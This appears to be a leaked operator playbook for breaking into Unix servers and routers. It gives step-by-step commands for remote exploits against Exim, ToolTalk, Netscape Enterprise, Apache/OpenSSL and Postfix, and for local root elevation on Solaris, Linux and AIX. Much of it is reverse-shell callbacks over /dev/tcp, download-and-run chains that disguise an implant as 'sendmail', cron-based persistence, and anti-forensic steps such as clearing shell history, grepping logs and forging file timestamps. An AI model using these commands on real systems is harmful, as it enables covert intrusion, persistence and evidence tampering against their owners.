(echo -e "HTTP/1.0 200\n";cat sendmail) | nc -vv -l -p RANDOM_PORT
# older versions of redhat cannot use /dev/tcp redirection, use wget;
./xp-exim-3 -i 127.0.0.1 -c "mkdir /tmp/.scsi; cd /tmp/.scsi; wget http://PITCH
_IP:RANDOM_PORT/sendmail -osendmail;chmod +x sendmail*; PATH=. sendmail;PATH=. s
endmail.1; PATH=. sendmail.2;"
## clean logs
# several entries in /usr/exim/spool/log/*
# with something like unqualified sender rejected
-lt /var/log/messages
-lt /var/log/maillog
-lt /usr/exim/spool/log
-tail /usr/exim/spool/log/rejectlog
-tail /usr/exim/spool/log/mainlog
############################################
# TOOLTALK -DEC, IRIX, or Sol2.6 or earlier
############################################
-scan rpc TARGET_IP
# look for 100083 1 tcp 30889 ttdbserverd
rpcinfo -n TTDBSERVERD_PORT -t TARGET_IP PROG_NUM
packrat pmgrd NETCAT_PORT
#ex:./dec_tt.tn.gr 1 200.21.200.2 LOCAL_IP 25 /tmp/.advtags 30889
./dec_tt.tn.gr 1 TARGET_IP LOCAL_IP NETCAT_PORT /tmp/WORK_DIR 30889
################################################
### VS - VIOLET
### You need to do this exploit from a box very close (ideally on the same net)
### as the target because of the traffic it generates.
### Reference the README file in /current/bin for help on the new version
################################################
#Start Xserver on local ops machine prior to logging in
### VS version5
xhost + <TARGET_IP or PITCH_IP>
iptables -F
netstat -an |grep 6000 (make sure local xserver is listening)
### run the test version first to get the times (if vulnerable):
-put /current/bin/vs.gettime.sol.sparc v
rpcinfo -p TARGET_IP
#Ex: ./v -i 202.83.160.51 -h ATMNMS -n 34647 -p 443
./v -i TARGET_IP -h HOSTNAME -n TCP_PROGRAMPORT -p CALLBACK_PORT
### hit return when prompted; once you get the times for the cookie
### you can throw the attack thru the redirector
-rm v
-cd /tmp
-rm .scsi
### set up the tunnels, using whichever ports you think can call back:
-tunnel
l TCP_PROGRAMPORT TARGET_IP
r 8080 127.0.0.1 6000
r 443
### locally, send the exploit:

./vs.attack.linux -i 127.0.0.1 -h HOSTNAME -x 8080 -c PITCH_IP -p 443 -n TCP_PRO
GRAMPORT -7(optional) -v 5 -T SECOND_FROM_GETTIME -t MICROSECS_FROM_GETTIME
### a dtterm should eventually pop up - get that mouse outta the way; get those
unsets ready!
###old way:
xhost + <TARGET_IP or PITCH_IP>

iptables -F
netstat -an |grep 6000 (make sure local xserver is listening)
#connect to redir (you'll need two windows, one for the tunnel,
#one to run the exploit)
#create a working dir on redir
#upload nopen
#start nopen
#check if you'll need to elevate (hope to see superuser next to
# vs port):
rpcinfo targetIP (no options)
#prepare vs.sparc command or vs.linux (depending on OS of local
# box or redir box)
#upload vs.sparc executable to redir
#create tunnel in nopen redir window
r 22222 127.0.0.1 6000
#paste vs command into 2nd nopen window (on redir)
-shell
./vs.sparc -7 -v 5 -i IP -h name -D -q PITCH_IP -p tunnelport -n programport
#hit return when prompted and wait possibly a long time)
#keep mouse/cursor away from area where window may pop up
#watch tcpdump window
#when dtterm pops up, paste each command:
w
df -k
#hit return on netcat window
#create another tunnel to netcat
r 32177
#in dtterm, paste upload command
#be sure to allow enough time for upload to get past redir and
# all the way to target
controlC netcat
#from redir, attempt to connect to target w/ nopen
#if successful, paste "exit" in dtterm
#If not, may have to start in callback mode
#paste upload commands
#./vs.linux -i target_ip -h hostname -r prog_num -v rpc_version -D -q local_ip -
p 6000 -n ?
./vs.linux -i -h -D -q -p 6000 -v 5 -r -n 52213
#Misc ex:
./vs.linux -i 555.1.2.79 -h blade1000 -D -q 554.208.30.2 -p 6000 -v 5 -r 128963
7086 -n 52213
mkdir /tmp/.scsi; cd /tmp/.scsi; telnet local_ip port </dev/console |uudecode; l
s -al
uncompress sendmail.Z; chmod +x sendmail; PATH=. sendmail
###################################################3
### TTSESSION (rpcttjamsession)
###################################################3
### pops a terminal back to your box
### make sure Xserver is running locally (may need to restart box):
netstat -an | grep 6000
### Allow a window to pop up on your local display:
xhost +
### and maybe:
iptables -F
### see if you'll need to elevate, see who is running that session:
### superuser is golden
-scan brpc TARGET_IP
mx
:%s/RANDOM_PORT/RANDOM1/g
:%s/DISPLAY_PORT/RANDOM2/g
:%s/TTSESSIONPROGNUM/TTSESSIONPROGNUM/g
:%s/TTSESSIONPROGPORT/TTSESSIONPROGPORT/g
`x
### Get your netcat ready
packrat NETCAT_PORT
### redirector
-tunnel
l RANDOM_PORT TARGET_IP TTSESSIONPROGPORT
r DISPLAY_PORT 127.0.0.1 6000
r NETCAT_PORT
### use info from highest ttsession portinfo:
# Usage:
#./rpcttjamsession [-p port] [-r rpc_program] [-v rpc_version][-d display_ip] [-
n display_port] [-c cookie_string] [-7] [-t] hostname
# -d display_ip - IP address to set DISPLAY
# -n display_port - redirection port for Xwindows, default is 6000.
# -t - test the RPC call, do not send message.
# -7 is for Solaris 7 default rpc program number
# -c - User's Cookie as a character string.
# (-v = rpcversion from scan results)
### REDIRECTED:
# Ex. - ./rpcttjamsession -d 203.555.28.242 -v 4 -n 22222 -p 32782 -r 134217727
9 127.0.0.1
./rpcttjamsession -d PITCH_IP -v RPCVERSION -n DISPLAY_PORT -p RANDOM_PORT -r TT
SESSIONPROGRAMNUMBER 127.0.0.1
### NO REDIRECTOR:
./rpcttjamsession -d LOCAL_IP -v RPCVERSION -n 6000 -p TTSESSIONPROGPORT -r TTSE
SSIONPROGRAMNUMBER TARGET_IP
### Be patient. Check your tunnels and watch for activity in your tcpdump.
### If all goes well, a target window will pop up in the left corner of your scr
een.
### Paste commands in it and GET MOUSE OUT OF THE BOX (generatesmore traffic bec
ause of X)
### get this ready for pasting:

unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
### for foreign language problems try this to pop back another xterm in
English:
echo $LANG
LANG=
export LANG
DISPLAY=PITCH_IP:RANDOM_1-6000
/usr/openwin/bin/xterm
telnet PITCH_IP NETCAT_PORT | uudecode
uncompress -f sendmail.Z
chmod 0700 sendmail
PATH=/tmp/.scsi sendmail
ls -la /tmp/.scsi
cd /tmp/.scsi; uncompress -f sendmail.Z
### get that mouse out of the way
### get on box with nopen:

-nstun TARGET_IP
### Cleanup:
/var/dt/Xerrors
/var/adm
/.sh_history
/.dt/startlog.old
### In remaining local windows, connect to PI host, then connect to TARGET: ####
######
-rm sendmail
### to PI host:
cd /current/down
../bin/noclient PITCH_IP:NETCAT_PORT
### from PI host to TARGET:
#-nstun TARGET_IP RAT_PORT
#-readrc ../etc/norc.osf1
#########################################################
# ENERGIZERBUNNY
#########################################################
# elevate to root: Sol 2.3-2.9
-put /current/up/eb eb
-put /current/up/mod32 mod32
# or -put /current/up/mod64 mod64
./eb -h
./eb [-k 32|64] [-p <pid>] [-u <uid>] [-g <gid>] [-n]
./eb
id
### start a new nopen as root:
PATH=. D="-l RANDOM" sendmail
-nstun TARGET_IP RANDOM
-rm eb mod32
#########################################################
# WALNUTSMOOTHY
#########################################################
# elevate to root: Sol 2.5.1-2.8
mkdir /tmp/1291aaab/
-put /current/up/efs f
cp f /tmp/1291aaab
-shell
cd /tmp/1291aaab
pwd
./f
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
cd /tmp/.scsi
head /etc/passwd
### start a new nopen as root while in -shell:
PATH=. D="-l RANDOM" sendmail
exit
### connect to privileged nopen:
-nstun TARGET_IP RANDOM
### burn unprivileged nopen
### cleanup files
-rm /tmp/1291aaab/f f sendmail
-rm /tmp/1291aaab
-lt /tmp
#########################################################
# EXTREMEPARR
#########################################################
# elevate to root: Sol 2.6-2.9
###
### make sure this exists:
-ls /usr/dt/bin/dtappgather
### Upload the proper version
-cd /tmp/.scsi
-put /current/up/exp.x.tar.Z b.tar.Z
uncompress b.tar.Z
tar -xf b.tar
### Find a setuid root program to use for the exploit
### The following should work:
### w, ps -ef, at -l, whodo, who, and ls -al
### Pick a program, determine the location, and verify setuid root is there
### (should see perms of -rwsr-xr-x)
which at
-ls /bin/at
### Verify su is NOT in the locale directory already
ls -al /usr/lib/locale/su
### Rename the shared object to have the name of 'su' or whichever loacale you u
se instead
### Be sure you use the correct version for the system's architecture
cp su.so.2.789x su.so.2
-ls -t
### Have a copy of nopen in your working directory to start up once you get root
:
-put /current/up/noserver sendmail
-ls
### Insert the local shared object /usr/lib/locale by running the following
### This will also generate itime commands to use later when cleaning up,
### normal error messages, and an indication of the success/failure of th
### insertion of the object into /usr/lib/locale
./exp su
echo "" | at now + 180 mins
### Set up your variables
-getenv
-setenv LC_TIME=su
-getenv
at -l
-shell
LC_TIME=su
export LC_TIME
at -l
id
pwd
cd /tmp/.scsi
PATH=. sendmail
exit
exit
### Connect from pitch to new noserver that has root privileges
-nstun TARGET_IP
### Burn your unprivileged nopen session and connect agin to new noserver
-burn
-nstun TARGET_IP
### Cleanup
at -l
at -r 1085530072.a
at -l
ls -al /.sh_history
-ls -t /
ls -lart /usr/lib/locale
rm /usr/lib/locale/su/*
rmdir /usr/lib/locale/su
-lt /usr/lib/locale
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
chmod 755 /usr/lib/locale
chmod 755 /var/dt/appconfig/appmanager
chmod 755 /var/dt/appconfig
chown bin:bin /usr/lib/locale
chown root:root /var/dt/appconfig/appmanager /var/dt/appconfig
ls -al /usr/lib | grep locale
-touch /usr/lib/localedef /usr/lib/locale
-w
-ls -t
id
-w
-ls
-ls -t /usr/lib/locale
-ls -t /usr/lib/locale/iso_8859_1
-ls -t /usr/lib/locale/iso_8859_1/LC_CTYPE
-touch /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
touch -r /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
-ls -t /usr/lib/locale
-ls -t /var/dt/
-ls -t /var/dt/appconfig
touch -r /var/dt/. /var/dt/appconfig/appmanager
touch -r /var/dt/. /var/dt/appconfig/.
-ls -t /var/dt/appconfig
-ls -t /var/dt/
### Clean up directory
-ls -t
-rm sendmail empty su.so.2 b.tar exp su.so.2.789x su.so.2.6x
-ls -t
### Check crontabs and logs if you used 'at'
-ls -t /var/adm
-ls -t /var/spool/cron
-ls -t /var/spool/cron/atjobs
touch -r /var/spool/cron/crontabs /var/spool/cron/atjobs
-tail -40 /var/cron/log
### Toast and sgrep your initial exploit
#######################################
### EVENTSTART
#######################################
### might reboot box on first try; after the reboot, it should work
### if you exploited an http service (like w/ EMBERSNOUT) make sure that
### service is started upon reboot; RH9.0 doesn't restart http by default
### unless the admin changed the config
### verify http is restarted at reboot:

-ls -t /etc/init.d
-ls -t /etc/rc.d/rc3.d
-ls /etc/rc.d/rc*.d/*htt*
chkconfig --list |grep htt
runlevel
### start a cron job to call nopen in case of a reboot (if you won't be able to
reexploit)
### set the time to remove itself to the next hour (use both local and UTC time)
vi /current/down/crontab:
0,5,10,15,20,25,30,35,40,45,50,55 * * * * sh -c "D=-cPITCH_IP:PORT /tmp/.httpd-l
ock/crond"
0 1,17 * * * crontab -r
### on target:
date; date -u
-ls -t /var/log/cron
-ls -t /var/spool/cron
-cat /etc/syslog.conf
crontab -l
-put /current/down/crontab crontab
-cat crontab
crontab crontab
crontab -l
date
### upload eventstart:

-shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
ls -l
PATH=. sendmail
exit
exit
### remove crontab after you elevate (or reboot - haha!)

crontab -r
#######################################
# PTRACE/FORKPTY
#######################################
### new exploit is ptrace-kmod; it's a kernel exploit, no suid needed.
### works on linux 2.2 -> 2.4, ex) RH8.0 and MDK 9.0
### might have to run it twice before it works.
### other ptraces are older and need to run against a setuid program that won't
log
### like /usr/sbin/usernetctl, /usr/sbin/userhelper, or /usr/sbin/traceroute
# find / -fstype nfs -prune -o -type f $ -perm -4000 $ -user root -ls > o
# get o
#### get ptrace, forkpty, and nopen tarball ready to send:
cd /current/up
cp ptrace<TAB> pt
cp forkpty fp
tar cvf 1u.tar pt sendmail fp
uuencode 1u.tar 1u.tar > 1u.tar.uu
nc -l -p NETCAT_PORT < 1u.tar.uu
#### to elevate and also get nopen there:
cd /tmp
mkdir .scsi
cd .scsi
telnet LOCAL_IP NETCAT_PORT > src
Connection closed by foreign host.
ls -la
uudecode src
ls -la
tar xvf 1u.tar
ls -la
chmod 700 fp sendmail pt
./fp
#### at sh-prompt, type:
tty
./pt
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
########################################
# TFTPD - upload image to router
########################################
### get on redirector with nopen

mkdir /tmp/.scsi
chmod 777 /tmp/.scsi
-cd /tmp/.scsi
-put ../up/tftpd_clean sched
### name the image EXACTLY how it will appear on the target - get tech guidance
-put image image.name
chmod 777 image.name
### start tftpd listener
#Example ./sched -l -a 10.0.0.14 -s /tmp/.scsi
# the -a IP option is the PITCH IP that talks to the router (if multiple interfa
ces)
-shell
./sched -l -a PITCH_IP -s /tmp/.scsi
DONE
exit
-rm image.name sched
-cd /tmp
-rm /tmp/.scsi
-lt
########################################
# SAMPLEMAN / ROUTER TOUCH
########################################
### redir
-tunnel
l 2323 TARGET_IP 23
### Locally:
telnet 127.0.0.1 2323
# userid = <>
# passwd = <>
term length 0
sh user
sh ver
sh arp
sh ip rout
sh proc cpu
enable
# enable password = <>
sh run
sh start
sh cdp neighbo detail
sh flash all
# use the chart to figure out mem location for the next command if applicable
sh mem <address>
logout
########################################
# ENGAGENAUGHTY
########################################
# Apache and SSL exploit on Linux on Dec ALpha
# ssl must be OpenSSL 0.9.6d or earlier
Usage: ./apache-ssl-linux-alpha <-i hostname> [-t arch] [-p port] [-n <connectio
ns>] [-a 0x<address>]
-t <arch> target architecture (default is 00)
-p <port> SSL port (default is 443)
-a 0x<address> the free location found via objdump
-n <N> open N apache connections before sending the shellcode (def
ault is 20)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
-c command to run (default is "ls > /tmp/ls".)Supported archit
ectures:
target archs:
00 - RedHat Linux 7.0 Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSS
L/0.9.5a
Examples: ./apache-ssl-linux-alpha -a 10 -v localhost
./apache-ssl-linux-alpha -p 1234 192.168.0.1 -n 40 -m 80
examples of commands:
1. xterm: /usr/X11R6/bin/xterm -display 555.1.2.153:0 -e /bin/sh
2. wget: First: echo -e "HTTP/1.0 200\n" > new; cat new noserver-2.6.1-i586.pc.
linux.gnu.redhat-5.0 > sendmail; nc -v -l -p 53 < sendmail
then: cd /tmp;wget http://555.1.2.153:53/sendmail; chmod +x /tmp/sendmail;PA
TH=/tmp sendmail;rm -f sendmail
3. xinetd (watch for logging): echo -e "service squid\n{\nsocket_type = stream\n
wait = no\nuser = apache\nserver = /bin/sh\n}" > /tmp/.scsi; /usr/sbin/xinetd -f
/tmp/.scsi
scan ssl TARGET_IP

### scripted window
nc -l -vv -p RANDOWM
-tunnel
r RANDOM
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(sh</dev/tcp/PITCH_IP/NE

TCAT_PORT>&0 2>&0)"
# or for ksh:
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(ksh -c "sh </dev/tcp/P
ITCH_IP/NETCAT_PORT >&0 2>&0")"
xhost +
-tunnel
r 6006 127.0.0.1 6000
### This one pops back an xterm (be patient for it to pop back and keep mouse cl
ear of window):
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "/usr/bin/X11/xterm -dis
play PITCH_IP:6 -e /bin/sh"
### Cleaning:
############################################################################
# EXPLOITRETURN
# redflag 2.0 and redhat 9.0 running PHP
# found in cgi-bin for sybil build
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2004 22:02:11 GMT
Server: Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP
/4.0.0 rus/PL29.4
-tunnel
l 80 TARGET_IP
# choose 79, 5555
r 79
or
r 5555
telnet 127.0.0.1 80
GET /HTTP/1.0
telnet 127.0.0.1 80
GET /ppd/product_user/reg_edu.php HTTP/1.0
# hit return twice
#response looking for: HTTP/1.1 302 Found
# do not use option 1 or 4 since it brings inconsistent results
xp_server
# uuencoded rat
uuencode sendmail sendmail > sendmail.uu
nc -l -v -p 79 < sendmail.uu
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n79
-t3
or
# no uuencode of rat
nc -l -v -p 5555 < sendmail
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n555
5 -t2
# after rat upload, <ctrl><c> nc command
-nstun TARGET_IP
# will be nobody - need to elevate with ptrace or other
# need to clean the following logs
#####################################################
# EGGBASKET
#####################################################
# Remote exploit against the Netscape Web Server which leverages
# a buffer overflow to obtain remote access
# Netscape Enterprise/3.6 and Netscape Enterprise/3.6 SP1
# works against AIMC Netscape servers also with right versions
# Netscape-Enterprise 3.6:
# solaris 2.6(sun4m only), sun4u & sun4m solaris 2.7 - 2.9
# Netscape-Enterprise/3.6 SP1:
# sun4m solaris 2.8, sun4m & sun4u solaris 2.9
# need local to elevate such as SMOOTHY and EXTREMEPARR
# Verify version of Netscape if target did not change version string
# from redirector
-tunnel
l 80 TARGET_IP
# locally
nc 127.0.0.1 80
GET / HTTP/1.0
<return>
<return>
# on redirector
-tunnel
l 80 TARGET_IP
r RANDOM_HIGH_PORT1
# locally window1
nc -vv -l -p RANDOM_HIGH_PORT1
# Usage: xp_ns-httpd
# i7 - program counter, location we are jumping to; fp - stack location; 04 -
where our code is
Targets: <version> <architecture> i7
fp o4
Version: 01: Netscape-Enterprise/3.6/sun4u/5.8/fire115/aimc 0xff2a2a74 0xff
2e6270 0x13ab60
Version: 02: Netscape-Enterprise/3.6/sun4m/5.8/theora/aimc 0xef722a74 0xef
766270 0x13a360
Version: 03: Netscape-Enterprise/3.6/sun4m/5.8/unixtest-4/aimc 0xef6e2a74 0xef
726270 0x13a060
Version: 04: Netscape-Enterprise/3.6/sun4u/5.8/unixtest-1/aimc 0xff2a2a74 0xff
2e6270 0x13a160
2e6270 0x13ab60
Version: 06: Netscape-Enterprise/3.6/sun4m/5.8/arc/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 07: Netscape-Enterprise/3.6/sun4u/5.7/baltimore/aimc 0xff2a2a74 0xff
2e6270 0x13a360
Version: 08: Netscape-Enterprise/3.6/sun4u/5.7/grandmama/aimc 0xff2a2a74 0xff
2e6270 0x13a260
Version: 09: Netscape-Enterprise/3.6/sun4m/5.7/unixtest-3/aimc 0xef722a74 0xef
766270 0x139360
Version: 10: Netscape-Enterprise/3.6/sun4m/5.6/elsa/aimc 0xef722a74 0xef
766270 0x13a060
Version: 11: Netscape-Enterprise/3.6/sun4m/5.6/gazoo/aimc 0xef722a74 0xef
766270 0x13a060
Version: 12: Netscape-Enterprise/3.6/sun4m/5.6/loneranger/aimc 0xef722a74 0xef
766270 0x139360
2e6270 0x139f60
Version: 14: Netscape-Enterprise/3.6/sun4m/5.9/mack/aimc 0xef6e2a74 0xef
726270 0x139d60
Version: 15: Netscape-Enterprise/3.6/sun4u/5.9/thing/aimc 0xff2a2a74 0xff
2e6270 0x139f60
Version: 16: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155090
Version: 17: Netscape-Enterprise/3.6/sun4u/5.9/fire117 0xff2a2a74 0xff
2e6270 0x155090
Version: 18: Netscape-Enterprise/3.6/sun4m/5.6/loneranger 0xef722a74 0xef
766270 0x153f78
Version: 19: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff
2e6270 0x155290
Version: 19: Netscape-Enterprise/3.6/sun4u/5.8/blade1000 0xff2a2a74 0xff
2e6270 0x155f90
Version: 20: Netscape-Enterprise/3.6sp1/sun4u/5.9/thing 0xff2a2c64 0xff
2e6750 0x155390
Version: 21: Netscape-Enterprise/3.6sp1/sun4m/5.8/theora 0xef722c64 0xef
766750 0x155390
Version: 22: Netscape-Enterprise/3.6sp1/sun4m/5.9/mack 0xef6e2c64 0xef
726750 0x155090
# -f webpath: usually just /

# -c command: "(ksh -c \"sh </dev/tcp/555.1.2.150/22222 >&0 2>&0\")&"
# -7 i7: have seen 0xff2a2a74, 0xef722a74, 0xef6e2a74
# -6 sp: these work 0xff2e6270, 0xef766270, 0xef726270
# -4 o4: <default 0x155090>, have seen 0x153090, when running AIMC, use 0
x139360
# -d destination target
# -p port: <default: 80>
# -s sleep number of seconds between requests <default: 7>
# -h usage
# -x range in the heap. <default: 32>
# -i heap increment. <default: 0x100> another good one to try is 0x80
# locally window2
# Example 1 assumes default install:
Example 1: xp_ns-httpd -f / -c "(ksh -c \"sh </dev/tcp/PITCH_IP/RANDOM_HIGH_PORT
1 >&0 2>&0\")&" -d 127.0.0.1 -p 80
# Example 2, Netscape was installed with AIMC:
Example 2, AIMC box: xp_ns-httpd -f / -c "(ksh -c \"sh </dev/tcp/PITCH_IP/
RANDOM_HIGH_PORT1 >&0 2>&0\")&" -d 127.0.0.1 -p 80 -4 0
x139360 -s 10 -x 64
Example 3, low level mode: xp_ns-httpd -f / -c "(ksh -c \"sh </dev/tcp/PIT
CH_IP/RANDOM_HIGH_PORT1 >&0 2>&0\")&" -7 0xff2a2a74 -6
0xff2e6270 -d 127.0.0.1 -p 80 -4 0x13a960 -s 10 -x 16
# Example 4, Netscape 3.6 SP1:
Example 4, SP1: xp_ns-httpd -f / -c "(ksh -c \"sh </dev/tcp/PITCH_IP/RANDO
M_HIGH_PORT1 >&0 2>&0\")&" -7 0xff2a2c64 -6 0xff2e6750
-d 127.0.0.1 -p 80
# Example 5, a busy Netscape 3.6 SP1:
Example 5: retry, but faster and more complete: xp_ns-httpd -f / -c "(ksh
-c \"sh </dev/tcp/PITCH_IP/RANDOM_HIGH_PORT1 >&0 2>&0\")&" -d 127.0.0.1 -s 5 -i
0x80
# Give troubleshooting instructions:

# There are five steps in troubleshooting EGGBASKET v2:
# Determine if the webserver is running Netscape-Enterprise 3.6 or 3.6 SP1.
# nc 127.0.0.1 80
GET / HTTP/1.0
<return>
<return>
# Determine the OS based upon touch information or MAC address.
# Maybe the server is busy serving requests, therefore try the
# following additional options:
-s 5 -i 0x80
# Maybe try a wider range in hitting the NOP sled, then try the
# following additional options:
-x 64 -4 0x139360 # AIMC
or
-x 64 -4 0x153090 # Normal install
# Is the target running the AIMC version, then try the following additional opti
on:
-4 0x139360
# The line "Errorlog" in $SERVERROOTDIR/config/magnus.conf tells where logging
# occurs
# If the exploit fails, it is logged as such:
# [18/Mar/2002:08:59:38] info (23834): successful server startup
# [18/Mar/2002:08:59:38] info (23834): Netscape-Enterprise/3.6 SP1 B99.036.2117
# [18/Mar/2002:08:59:38] verbose (23834): livewireInit reports: Starting Server-
Side JavaScript build: 99.036.2332
###################### EXCEEDSALON-AIX #####################
## local elevation for AIX
## does not log but check anyway
# elevation as user
mkdir /tmp/.pci
cd /tmp/.pci
# use ftshell, uudecode copy/paste, telnet/nc, or wget to put
# /current/up/xp_lquerypv-aix5.1 up as s
./s
# elevation in nopen
mkdir /tmp/.pci
-cd /tmp/.pci
-put /current/up/xp_lquerypv-aix5.1 s
-shell
id
(user)
./s
id
(euid=root)
./sendmail
/tmp/exit
###################### ESTOPFORBADE #####################
# local root elevation against gds_inet_server under
# Cobalt Linux release 6.0
# for complexpuzzle
# on target from nopen
-lt /usr/local/sbin/gds_inet_server
mkdir /tmp/.pci
-cd /tmp/.pci
pwd
-put /current/up/xp_gds_inet_server g
-shell
id
./g
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
# try up to 2 times for elevation
#####################################################
# ENTERSEED
#####################################################
#
# Apparently, 30 or so minutes and you can bail...no joy.
#
## Set up redirector
-tunnel
l 2500 TARGET_IP 25
r NETCAT_PORT 127.0.0.1 NETCAT_PORT
## set up a netcat listener in a local scripted window

## to upload a STATICALLY COMPILED NOPEN
nc -l -v -p NETCAT_PORT < noserver-static
## LOCALLY in another window: OPTIONAL: Alert to show we hit
while [ 1 ] ; do netstat -an | grep NETCAT_PORT.*LISTEN || break ; sleep 2 ; don
e ; beeps 3333
## run exploit in a local scripted window
#Usage: ./enterseed.py <target-ip> <target-port> <callback-ip> <callback-port> <
platform> [-search<scale>] [-u<valid-username>] [-fuploaded-filename]
#Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41)
# 2: SuSE 9.1 RPM (postfix-2.0.19_20040312-11)
# 3: ASP Linux 9 RPM (postfix-2.0.8-1asp)
# NOTE: THERE ARE OTHERS BEYOND 3....6 is Debian 3.1 for instance....
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1 -uroot@TARGET_IP
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2 -uroot@TARGET_IP
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 3 -uroot@TARGET_IP -search1
## once the exploit calls back and nopen uploaded connect to noserver
-nstun TARGET_IP
## check to see if you are chroot'd
-lt /
## if it looks like
#drwx------ 2 postfix root 4096 Apr 27 04:35 2003 corrupt
#drwx-wx--- 2 postfix postdrop 4096 Apr 27 04:35 2003 maildrop
#drwx------ 2 postfix root 4096 Apr 27 04:35 2003 saved
#drwxr-xr-x 3 root root 4096 Nov 17 07:22 2004 usr
#drwxr-xr-x 18 root root 4096 Nov 17 07:22 2004 .
#drwxr-xr-x 2 root root 4096 Nov 17 07:22 2004 lib
#drwx------ 2 postfix root 4096 Nov 17 07:22 2004 hold
#drwxr-xr-x 26 root root 4096 Nov 17 07:36 2004 ..
#drwxr-xr-x 2 root root 4096 Nov 18 12:54 2004 etc
#drwx------ 18 postfix root 4096 Nov 18 14:50 2004 active
#drwx------ 18 postfix root 4096 Nov 18 14:50 2004 bounce
#drwx------ 18 postfix root 4096 Dec 1 12:37 2004 deferred
#drwx------ 3 postfix root 4096 Dec 1 14:53 2004 flush
#drwxr-xr-x 2 root root 4096 Dec 1 14:53 2004 pid
#drwx------ 15 postfix root 4096 Dec 8 14:00 2004 defer
#drwx------ 2 postfix root 4096 Mar 4 15:34 2005 private
#drwx--x--- 2 postfix postdrop 4096 Mar 4 15:34 2005 public
#drwxrwxrwx 19 postfix root 4096 Mar 7 11:36 2005 incoming
## this means you are in a chrooted environment without any binaries
## (no ls, netstat, ps, which, w, ...)
## IF NOT CHROOTED, continue to clean logs
## IF CHROOTED
-cd incoming
-put /current/up/b b
-put /current/up/s s
-put /current/up/noserver ncd
## change permissions
./s h
./s b
./s ncd
./s .
## run break chroot routines
./h
## you should be able to connect to a new nopen running
-nstun TARGET_IP 32755
## CLEANUP
## the location of the chrooted environment was /var/spool/postfix/
-lt /var/spool/postfix/
-lt /var/spool/postfix/incoming
-rm b h s ncd a..
## CLEAN LOGS
## check logs /var/log/mail* /var/adm/mail* /var/log/messages /var/adm/messages
grep "stripping too many comments" /var/adm/mail*
grep "stripping too many comments" /var/log/mail*
grep "signal 11" /var/log/mail*
grep "signal 11" /var/adm/mail*
grep "bogus file" /var/adm/mail*
grep "bogus file" /var/log/mail*
grep "writable by everyone" /var/adm/mail*
grep "writable by everyone" /var/log/mail*
grep PITCH_IP /var/log/messages
grep PITCH_IP /var/adm/messages
## if any of the directories or files were changed to world writable
## change them back because postfix will panic
chmod PREV_PERM /var/spool/postfix/incoming
########################################
# Exploits a vulnerability in the Postfix mail server.
# Postfix runs on FreeBSD, Linux, Solaris, and most Unix servers.
# This exploit works for the default binary packages in SuSE 9.0-9.2, ASP Linux
9, and Debian 3.1
# must elevate to get root
# postfix 2.0.14-41 on SuSE 9.0
# postfix 2.0.19_20040312-11 on SuSE 9.1
# postfix-2.0.8-1asp on ASP Linux 9
# postfix-2.1.5 on SuSE 9.2
# postfix-2.1.5 on Debian 3.1
#
# ENTERSEED expects the DUL Encoder to be in its current directory, as well
# as write permission to that directory.
#
# In the event of a chroot'ed environment, shared libraries will not be us
uable.
# Any uploaded files (such as noserver) must be statically compiled.
#
# -tunnel
# r NETCAT_PORT
# l RANDOM TARGET_IP TARGET_PORT
./enterseed.py 127.0.0.1 RANDOM PITCH_IP NETCAT_PORT <platform> [-search<scale>]

[-u<valid-username>] [-f<uploaded-filename>]
# Usage: ./enterseed.py <target-ip> <target-port> <callback-ip> <callback-port>
<platform> [-search<scale>] [-u<valid-username>] [-f<uploaded-filename>]
# Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41) from short h
ostname (0-19 chars)
# 2: SuSE 9.0 RPM (postfix-2.0.14-41) from long ho
stname (17-43 chars)
# 3: SuSE 9.1 RPM (postfix-2.0.19_20040312-11) fro
m long hostname (17-43 chars)
# 4: ASP Linux 9 RPM (postfix-2.0.8-1asp) from lon
g hostname (17-43 chars)
# 5: SuSE 9.2 RPM (postfix-2.1.5)
# 6: Debian 3.1 (sarge) DEB (postfix-2.1.5)
#
#
# Chroot Example:
#
# Begin like above. Once connected with noclient, -cd to incoming and upload th
e statically compiled
# EVENTSTART, the breakchroot program, and the setperms program (for this exampl
e, these
# binaries are named h, b, and s, respectively. Since EVENTSTART is unable to ta
ke command-line
# arguments or environment variables, h expects breakchroot to be named "b" and
breakchroot
# expects noserver to be named "ncd." The names are all configurable, but requi
re a recompile.
# Be sure to compile statically!)
#
# After uploading, use s to set the permissions on b, ncd and the current direct
ory:
# (remote)$ ./s b
# (remote)$ ./s ncd
# (remote)$ ./s .
# These files should all be set to mode 777 now.
#
# Now run EVENTSTART:
# (remote)$ ./h
# EVENTSTART will execute b (the breakchroot program) with root privileges, whic
h will in turn break
# out of the chroot and exec ncd (noserver) from the root directory and with roo
t privileges.
